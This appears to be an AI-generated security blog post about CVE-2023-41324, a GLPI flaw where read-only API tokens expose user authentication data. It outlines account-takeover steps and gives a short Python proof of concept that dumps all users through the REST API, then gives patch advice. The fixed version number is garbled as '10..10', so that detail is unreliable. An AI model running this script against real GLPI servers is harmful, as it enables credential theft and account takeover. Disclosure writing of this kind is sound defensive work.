GLPI, short for Gestionnaire Libre de Parc Informatique, is a powerful piece of free software for managing IT assets and help desks. Used worldwide by organizations large and small, GLPI keeps track of your company's hardware, software, licenses, support tickets and even contracts. But in late 2023, a serious vulnerability was discovered—a bug that could let attackers steal the accounts of any GLPI user, just by having API read access. This is CVE-2023-41324.
Let's dive into what went wrong, how it works, and what you can do to protect your system.
What Is GLPI and Why Is This a Big Deal?
If you’re using GLPI to manage your company's digital assets, you trust it with loads of sensitive information. Think user accounts, hardware inventory, support communications, plus integrations with other business platforms.
To help third-party tools or custom scripts fetch information, GLPI provides a powerful REST API. This API allows certain users or automated jobs to fetch (and sometimes update) info from the GLPI database.
But what if simply reading data through this API could let someone take over ANY user account—even administrator accounts? That’s exactly the problem uncovered in CVE-2023-41324.
The Core Issue
A user with a "read access" API token—who *should* only be able to view user data—could actually grab enough information to impersonate any other user account in GLPI. This escalates their access instantly.
Why did this happen?
GLPI’s /apirest.php/User endpoint exposed baking details about users, including fields that could let a malicious actor "forge" or take over sessions. Some output included authentication credentials or secret tokens by mistake.
Exploit Details: Stealing Accounts in Practice
1. Attacker gets API read access. This might be a low-privilege API account typical for inventory reporting or external integrations.
2. Attacker lists users: Using the API, fetches a JSON array containing details on all user accounts, including their authentication data.
Attacker chooses a target (like an admin), grabs sensitive fields from their JSON.
4. Attacker uses these fields to "replay" credentials or create a session as the victim—maybe by faking API requests or sessions, depending on GLPI’s internal auth logic.
Simple PoC (Proof of Concept) with Python
import requests
# Replace with your own GLPI instance and read-only API token
GLPI_HOST = "https://your.glpi.instance";
API_TOKEN = "YOUR_READ_ONLY_API_TOKEN"
headers = {
"Authorization": f"user_token {API_TOKEN}",
"App-Token": "YOUR_GLPI_APP_TOKEN",
}
# Fetch all users
response = requests.get(f"{GLPI_HOST}/apirest.php/User", headers=headers)
users = response.json()
# Print info—see what’s exposed!
for u in users:
print(u) # Look for sensitive fields: login, authentication tokens, etc.
Warning: On vulnerable versions, you'll see sensitive authentication tokens or hashes. In practice, an attacker would use these to impersonate someone else.
Official Recommendations
- Patch Now: The GLPI team fixed this problem in version 10..10.
If you’re running anything before 10..10, you are exposed.
- No Workarounds: There are NO reliable workarounds—revoking read-only API keys does NOT fix already-exposed data.
- Audit API Tokens: Remove unnecessary user and API tokens in your install, and monitor for unauthorized logins.
References & Further Reading
- CVE-2023-41324 at NIST NVD
- GLPI Release 10..10 - Security Advisory
- Original GitHub Security Advisory
Final Thoughts
CVE-2023-41324 is a wake-up call: even “just read-only” API access can present a major risk if sensitive authentication data is exposed in API responses. If you run GLPI, update right now. Don’t give your attackers a free pass to your organization's crown jewels!
Stay safe. Patch early!
*Exclusive post by ChatGPT. Share responsibly. For more IT security news, subscribe to updates from NIST and your favorite open source security trackers.*
Timeline
Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/29/2023 18:11:00 UTC